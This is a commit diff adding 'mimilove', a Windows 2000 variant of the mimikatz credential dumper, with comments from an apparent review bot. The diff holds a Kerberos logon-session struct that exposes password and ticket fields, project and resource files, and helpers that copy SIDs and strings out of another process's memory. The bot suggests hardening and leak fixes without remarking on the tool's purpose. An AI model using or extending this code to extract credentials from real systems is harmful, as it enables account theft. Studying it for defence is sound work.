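+typedef struct _KIWI_KERBEROS_LOGON_SESSION_50 {
+LIST_ENTRY Entry;
+ULONG unk0;
+LUID LocallyUniqueIdentifier;
+ULONG unk6;
+ULONG unk7;
+ULONG unk8;
+PVOID unk9;
+ULONG unk10;
+PVOID unk11;
+PVOID unk12;
+PVOID unk13;
+PVOID unk14;
+LSA_UNICODE_STRING UserName;
+LSA_UNICODE_STRING Domaine;
+LSA_UNICODE_STRING Password;
+ULONG unk15;
+ULONG unk16;
+ULONG unk17;
+ULONG unk18;
+PVOID unk19;
+PVOID unk20;
+PVOID unk21;
+PVOID unk22;
+PKIWI_KERBEROS_KEYS_LIST_5 pKeyList;
+PVOID unk24;
+LIST_ENTRY Tickets_1; // for coders, they're here =)
+LIST_ENTRY Tickets_2;
+ULONG unk23;
+LIST_ENTRY Tickets_3;
+} KIWI_KERBEROS_LOGON_SESSION_50, *PKIWI_KERBEROS_LOGON_SESSION_50;
+int wmain(int argc, wchar_t *argv[]);
+BOOL kuhl_m_sekurlsa_utils_love_search(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION mi, PKULL_M_MINI_PATTERN pa, PVOID * genericPtr);
+void mimilove_lsasrv(PKULL_M_MEMORY_HANDLE hMemory);
+void mimilove_kerberos(PKULL_M_MEMORY_HANDLE hMemory);
+PCWCHAR mimilove_kerberos_etype(LONG eType);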

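--- /dev/null
+++ b/mimilove/mimilove.rc
@@ -0,0 +1,34 @@
+#include <winres.h>
+LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
+VS_VERSION_INFO VERSIONINFO
+FILEVERSION 1,0,0,0
+PRODUCTVERSION 1,0,0,0
+FILEFLAGS VS_FF_PRERELEASE|VS_FF_SPECIALBUILD|VS_FF_PRIVATEBUILD
+FILEFLAGSMASK VS_FFI_FILEFLAGSMASK
+FILEOS VOS_NT
+FILETYPE VFT_APP
+//FILESUBTYPE 0x0L
+BEGIN
+BLOCK "StringFileInfo"
+BEGIN
+BLOCK "040904b0"
+BEGIN
+VALUE "ProductName", "mimilove"
+VALUE "ProductVersion", "1.0.0.0"
+VALUE "CompanyName", "gentilkiwi (Benjamin DELPY)"
+VALUE "FileDescription", "mimilove for Windows 2000"
+VALUE "FileVersion", "1.0.0.0"
+VALUE "InternalName", "mimilove"
+VALUE "LegalCopyright", "Copyright (c) 2007 - 2015 gentilkiwi (Benjamin DELPY)"
+VALUE "OriginalFilename", "mimilove.exe"
+VALUE "PrivateBuild", "Build with love for POC only"
+VALUE "SpecialBuild", "kiwi flavor !"
+END
+END
+BLOCK "VarFileInfo"
+BEGIN
+VALUE "Translation", 0x0409, 1200
+END
+END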

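--- /dev/null
+++ b/mimilove/mimilove.vcxproj
@@ -0,0 +1,99 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<ItemGroup Label="ProjectConfigurations">
+<ProjectConfiguration Include="Release|Win32">
+<Configuration>Release</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|x64">
+<Configuration>Release</Configuration>
+<Platform>x64</Platform>
+</ProjectConfiguration>
+</ItemGroup>
+<PropertyGroup Label="Globals">
+<ProjectGuid>{60D02E32-1711-4D9E-9AC2-10627C52EB40}</ProjectGuid>
+<Keyword>Win32Proj</Keyword>
+<RootNamespace>mimilove</RootNamespace>
+<SccProjectName>Svn</SccProjectName>
+<SccAuxPath>Svn</SccAuxPath>
+<SccLocalPath>Svn</SccLocalPath>
+<SccProvider>SubversionScc</SccProvider>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+<PropertyGroup Label="Configuration">
+<UseDebugLibraries>false</UseDebugLibraries>
+<WholeProgramOptimization>true</WholeProgramOptimization>
+<CharacterSet>Unicode</CharacterSet>
+<PlatformToolset>v100</PlatformToolset>
+<PlatformToolset Condition="'$(VCTargetsPath11)' != ''">v110_xp</PlatformToolset>
+<PlatformToolset Condition="'$(VCTargetsPath12)' != ''">v120_xp</PlatformToolset>
+<UseOfMfc>static</UseOfMfc>
+</PropertyGroup>
+<PropertyGroup Label="Configuration" Condition="Exists('$(VCTargetsPath)\Platforms\$(Platform)\PlatformToolsets\ddk2003') Or Exists('$(VCTargetsPath)\..\Platforms\$(Platform)\PlatformToolsets\ddk2003')">
+<PlatformToolset>ddk2003</PlatformToolset>
+<UseOfMfc>false</UseOfMfc>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+<PropertyGroup>
+<OutDir>$(SolutionDir)$(Platform)\</OutDir>
+<IntDir>$(Platform)\</IntDir>
+<LinkIncremental>false</LinkIncremental>
+<IncludePath>$(SolutionDir)inc;$(IncludePath)</IncludePath>
+<LibraryPath>$(SolutionDir)lib\$(Platform);$(LibraryPath)</LibraryPath>
+</PropertyGroup>
+<ItemDefinitionGroup>
+<ClCompile>
+<WarningLevel>Level3</WarningLevel>
+<PrecompiledHeader>NotUsing</PrecompiledHeader>
+<Optimization>Full</Optimization>
+<FunctionLevelLinking>true</FunctionLevelLinking>
+<IntrinsicFunctions>false</IntrinsicFunctions>
+<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;MIMIKATZ_W2000_SUPPORT;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<InlineFunctionExpansion>AnySuitable</InlineFunctionExpansion>
+<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+<OmitFramePointers>true</OmitFramePointers>
+<StringPooling>true</StringPooling>
+<ExceptionHandling>false</ExceptionHandling>
+<BufferSecurityCheck>false</BufferSecurityCheck>
+<FloatingPointModel>Fast</FloatingPointModel>
+<FloatingPointExceptions>false</FloatingPointExceptions>
+<CreateHotpatchableImage>false</CreateHotpatchableImage>
+<ErrorReporting>None</ErrorReporting>
+<TreatWarningAsError>true</TreatWarningAsError>
+</ClCompile>
+<Link>
+<SubSystem>Console</SubSystem>
+<GenerateDebugInformation>false</GenerateDebugInformation>
+<EnableCOMDATFolding>true</EnableCOMDATFolding>
+<OptimizeReferences>true</OptimizeReferences>
+<AdditionalDependencies>advapi32.lib;ntdll.min.lib;%(AdditionalDependencies)</AdditionalDependencies>
+<AssemblyDebug>false</AssemblyDebug>
+<DataExecutionPrevention>true</DataExecutionPrevention>
+<LinkErrorReporting>NoErrorReport</LinkErrorReporting>
+<ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
+<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
+</Link>
+</ItemDefinitionGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+<ItemGroup>
+<ClCompile Include="..\modules\kull_m_kernel.c" />
+<ClCompile Include="..\modules\kull_m_memory.c" />
+<ClCompile Include="..\modules\kull_m_minidump.c" />
+<ClCompile Include="..\modules\kull_m_output.c" />
+<ClCompile Include="..\modules\kull_m_process.c" />
+<ClCompile Include="..\modules\kull_m_string.c" />
+<ClCompile Include="mimilove.c" />
+</ItemGroup>
+<ItemGroup>
+<ClInclude Include="..\modules\kull_m_kernel.h" />
+<ClInclude Include="..\modules\kull_m_memory.h" />
+<ClInclude Include="..\modules\kull_m_minidump.h" />
+<ClInclude Include="..\modules\kull_m_output.h" />
+<ClInclude Include="..\modules\kull_m_process.h" />
+<ClInclude Include="..\modules\kull_m_string.h" />
+<ClInclude Include="mimilove.h" />
+</ItemGroup>
+<ItemGroup>
+<ResourceCompile Include="mimilove.rc" />
+</ItemGroup>
+</Project>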
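Review bot: `<BufferSecurityCheck>false</BufferSecurityCheck>` switches off the /GS stack cookie for a binary whose whole job is to parse structures copied out of another process (`mimilove.c` indexes a table and sizes allocations with those copied values), which is exactly the code shape a cookie is meant to backstop; `<ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>` drops SafeSEH for the same image. Unless the ddk2003 toolset used for the Windows 2000 target cannot supply the /GS runtime, both should be `true`, or a comment next to them should record why they are off. This probably mirrors the sibling project files, which are outside this page.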


@ -0,0 +1,56 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<ClCompile Include="mimilove.c" />
<ClCompile Include="..\modules\kull_m_output.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_process.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_memory.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_string.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_minidump.c">
<Filter>common modules</Filter>
</ClCompile>
<ClCompile Include="..\modules\kull_m_kernel.c">
<Filter>common modules</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="mimilove.h" />
<ClInclude Include="..\modules\kull_m_output.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_process.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_memory.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_string.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_minidump.h">
<Filter>common modules</Filter>
</ClInclude>
<ClInclude Include="..\modules\kull_m_kernel.h">
<Filter>common modules</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<Filter Include="common modules">
<UniqueIdentifier>{7cb872e7-a52b-4394-a979-fd7a0a89d729}</UniqueIdentifier>
</Filter>
<Filter Include="sekurlsa">
<UniqueIdentifier>{22523588-1016-45eb-b8d6-cc8f2763c695}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="mimilove.rc" />
</ItemGroup>
</Project>


@ -374,6 +374,7 @@ BOOL kull_m_process_peb(PKULL_M_MEMORY_HANDLE memory, PPEB pPeb, BOOL isWOW)
switch(memory->type)
{
#ifndef MIMIKATZ_W2000_SUPPORT
case KULL_M_MEMORY_TYPE_OWN:
if(!isWOW)
{
@ -381,6 +382,7 @@ BOOL kull_m_process_peb(PKULL_M_MEMORY_HANDLE memory, PPEB pPeb, BOOL isWOW)
status = TRUE;
break;
}
#endif
case KULL_M_MEMORY_TYPE_PROCESS:
if(NT_SUCCESS(NtQueryInformationProcess(hProcess, info, buffer, szBuffer, &szInfos)) && (szInfos == szBuffer) && processInformations.PebBaseAddress)
{
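Review bot: The new `#ifndef MIMIKATZ_W2000_SUPPORT` / `#endif` pair (first and second hunk) compiles the `KULL_M_MEMORY_TYPE_OWN` case out of `kull_m_process_peb` without saying why, so in the W2000 build an own-process handle silently falls to whatever the `switch` does in its `default` (outside this hunk). A one-line comment at the guard would carry the intent, e.g. `/* W2000 build: own-process PEB lookup is compiled out; only KULL_M_MEMORY_TYPE_PROCESS handles are handled here */`. Note also that the `#endif` sits after the closing brace of `if(!isWOW)`, and the `break` is inside that brace, so as far as these two hunks show the OWN case still falls through into the PROCESS case when `isWOW` is set in the normal build — pre-existing, but worth a `/* fallthrough */` marker now that the block is being touched. `kull_m_process_peb` starts and ends outside the hunk.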


@ -42,6 +42,36 @@ BOOL kull_m_string_getUnicodeString(IN PUNICODE_STRING string, IN PKULL_M_MEMORY
return status;
}
BOOL kull_m_string_getSid(IN PSID * pSid, IN PKULL_M_MEMORY_HANDLE source)
{
BOOL status = FALSE;
BYTE nbAuth;
DWORD sizeSid;
KULL_M_MEMORY_HANDLE hOwn = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aDestin = {&nbAuth, &hOwn};
KULL_M_MEMORY_ADDRESS aSource = {(PBYTE) *pSid + 1, source};
*pSid = NULL;
if(kull_m_memory_copy(&aDestin, &aSource, sizeof(BYTE)))
{
aSource.address = (PBYTE) aSource.address - 1;
sizeSid = 4 * nbAuth + 6 + 1 + 1;
if(aDestin.address = LocalAlloc(LPTR, sizeSid))
{
*pSid = (PSID) aDestin.address;
status = kull_m_memory_copy(&aDestin, &aSource, sizeSid);
}
}
return status;
}
void kull_m_string_MakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, BOOL relative)
{
if(String->Buffer)
String->Buffer = (PWSTR) ((ULONG_PTR)(String->Buffer) + ((relative ? -1 : 1) * (ULONG_PTR)(BaseAddress)));
}
BOOL kull_m_string_copyUnicodeStringBuffer(PUNICODE_STRING pSource, PUNICODE_STRING pDestination)
{
BOOL status = FALSE;
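Review bot: `kull_m_string_getSid` can return FALSE with `*pSid` still pointing at the `LocalAlloc` block: when the second `kull_m_memory_copy` fails, `status` is FALSE but the allocation assigned to `*pSid` two lines earlier is neither freed nor cleared, so a caller that frees only on success (as `kuhl_m_sekurlsa_trust_domaininfo` does elsewhere in this commit) leaks it. Change the copy to `status = kull_m_memory_copy(&aDestin, &aSource, sizeSid); if(!status) { LocalFree(*pSid); *pSid = NULL; }` so the out-parameter is NULL on every failure path. `nbAuth` is also taken straight from the source process; rejecting `nbAuth > SID_MAX_SUB_AUTHORITIES` before sizing, and computing the size as `GetSidLengthRequired(nbAuth)` instead of `4 * nbAuth + 6 + 1 + 1`, would both refuse a corrupt count and name what the constants stand for. `kull_m_string_MakeRelativeOrAbsoluteString` is only moved into this file with its body unchanged.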


@ -43,8 +43,13 @@ extern NTSTATUS NTAPI RtlValidateUnicodeString(IN ULONG Flags, IN PCUNICODE_STRI
extern NTSTATUS WINAPI RtlAppendUnicodeStringToString(IN OUT PUNICODE_STRING Destination, IN PCUNICODE_STRING Source);
extern VOID NTAPI RtlRunDecodeUnicodeString(IN BYTE Hash, IN OUT PUNICODE_STRING String);
extern VOID NTAPI RtlRunEncodeUnicodeString(IN OUT PBYTE Hash, IN OUT PUNICODE_STRING String);
BOOL kull_m_string_suspectUnicodeStringStructure(IN PUNICODE_STRING pUnicodeString);
BOOL kull_m_string_getUnicodeString(IN PUNICODE_STRING string, IN PKULL_M_MEMORY_HANDLE source);
BOOL kull_m_string_getSid(IN PSID * pSid, IN PKULL_M_MEMORY_HANDLE source);
void kull_m_string_MakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, BOOL relative);
BOOL kull_m_string_copyUnicodeStringBuffer(PUNICODE_STRING pSource, PUNICODE_STRING pDestination);
void kull_m_string_freeUnicodeStringBuffer(PUNICODE_STRING pString);
BOOL kull_m_string_suspectUnicodeString(IN PUNICODE_STRING pUnicodeString);
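Review bot: The new `kull_m_string_getSid` prototype does not document the unusual in/out contract of `pSid`: per the implementation added in this commit, `*pSid` is read on entry as the SID's address inside `source`, then overwritten with a `LocalAlloc`'d copy that the caller must `LocalFree` (or NULL when the sub-authority count could not be read). A comment on the declaration would prevent misuse, e.g. `/* in: *pSid = SID address in source; out: *pSid = LocalAlloc'd copy owned by the caller, NULL if the header read fails */`. The same applies to `kull_m_string_MakeRelativeOrAbsoluteString`, whose `relative` flag subtracts `BaseAddress` from `String->Buffer` when TRUE and adds it when FALSE, which is not guessable from the name.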